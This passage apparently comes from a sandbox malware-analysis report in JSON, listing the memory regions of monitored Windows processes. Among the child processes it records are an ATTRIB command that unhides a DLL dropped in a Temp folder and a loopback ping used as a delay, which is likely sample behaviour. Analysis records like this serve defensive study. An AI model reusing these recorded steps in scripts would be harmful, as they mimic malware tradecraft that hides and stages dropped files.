"writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1419", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:51.057", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1420", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:51.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1421", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:51.058", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1422", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:51.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1423", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:51.059", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1424", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:51.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3244031, "entry_point": 0, "filename": null, "id": "region_1425", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2424832, "timestamp": "00:00:51.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1426", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:51.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1427", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:51.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1428", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:51.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_1429", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:51.071", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001430-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1430", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:51.071", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001431-addr_0x0000000000100000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_1431", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:51.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 6361087, "entry_point": 0, "filename": null, "id": "region_1432", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:00:51.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 19005439, "entry_point": 0, "filename": null, "id": "region_1433", "name": "pagefile_0x0000000000620000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6422528, "timestamp": "00:00:51.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 20459519, "entry_point": 0, "filename": null, "id": "region_1434", "name": "pagefile_0x0000000001220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19005440, "timestamp": "00:00:51.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1435", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:51.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1436", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:51.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1437", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:51.091", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000023-region_00001438-addr_0x0000000000110000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1179647, "entry_point": 0, "filename": null, "id": "region_1438", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:51.098", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20512768, "type": "region", "version": 1 }, "end_va": 23457791, "entry_point": 20512768, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1439", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20512768, "timestamp": "00:00:51.115", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "ATTRIB -h -s \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\"", "filename": "c:\\windows\\system32\\attrib.exe", "id": "proc_24", "image_name": "attrib.exe", "monitor_reason": "child_process", "monitored_id": 24, "origin_monitor_id": 23, "ref_parent_process": { "ref_id": "proc_23", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000024-region_00001440-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1440", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:51.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1441", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:51.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1442", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:51.147", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000024-region_00001443-addr_0x00000000001f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_1443", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:51.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 7565311, "entry_point": 7536640, "filename": "\\Windows\\System32\\attrib.exe", "id": "region_1444", "name": "attrib.exe", "norm_filename": "c:\\windows\\system32\\attrib.exe", "region_type": "memory_mapped_file", "start_va": 7536640, "timestamp": "00:00:51.147", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1445", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:51.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1446", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:51.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1447", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:51.157", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000024-region_00001448-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_1448", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:51.157", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000024-region_00001449-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1449", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:51.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1450", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:51.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1451", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:51.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1452", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:51.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000024-region_00001453-addr_0x0000000000100000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1453", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:00:51.197", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000024-region_00001454-addr_0x00000000003a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_300", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_1454", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:51.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 118784, "start_va": 1857814528, "type": "region", "version": 1 }, "end_va": 1857933311, "entry_point": 1857814528, "filename": "\\Windows\\System32\\ulib.dll", "id": "region_1455", "name": "ulib.dll", "norm_filename": "c:\\windows\\system32\\ulib.dll", "region_type": "memory_mapped_file", "start_va": 1857814528, "timestamp": "00:00:51.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1456", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:51.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1457", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:51.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1458", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:51.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1459", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:51.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1460", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:51.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1461", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:51.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1462", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:51.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1463", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:51.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1464", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:51.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1465", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:51.211", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1466", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:51.212", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1933311, "entry_point": 0, "filename": null, "id": "region_1467", "name": "pagefile_0x0000000000110000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1114112, "timestamp": "00:00:51.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1468", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:51.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1469", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:51.215", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "Ping 127.0.0.1 -n 3", "filename": "c:\\windows\\system32\\ping.exe", "id": "proc_25", "image_name": "ping.exe", "monitor_reason": "child_process", "monitored_id": 25, "origin_monitor_id": 23, "ref_parent_process": { "ref_id": "proc_23", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000025-region_00001470-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1470", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:51.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1471", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:51.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:51.268", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001473-addr_0x00000000001b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1473", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:51.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 15925248, "type": "region", "version": 1 }, "end_va": 15958015, "entry_point": 15925248, "filename": "\\Windows\\System32\\PING.EXE", "id": "region_1474", "name": "ping.exe", "norm_filename": "c:\\windows\\system32\\ping.exe", "region_type": "memory_mapped_file", "start_va": 15925248, "timestamp": "00:00:51.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 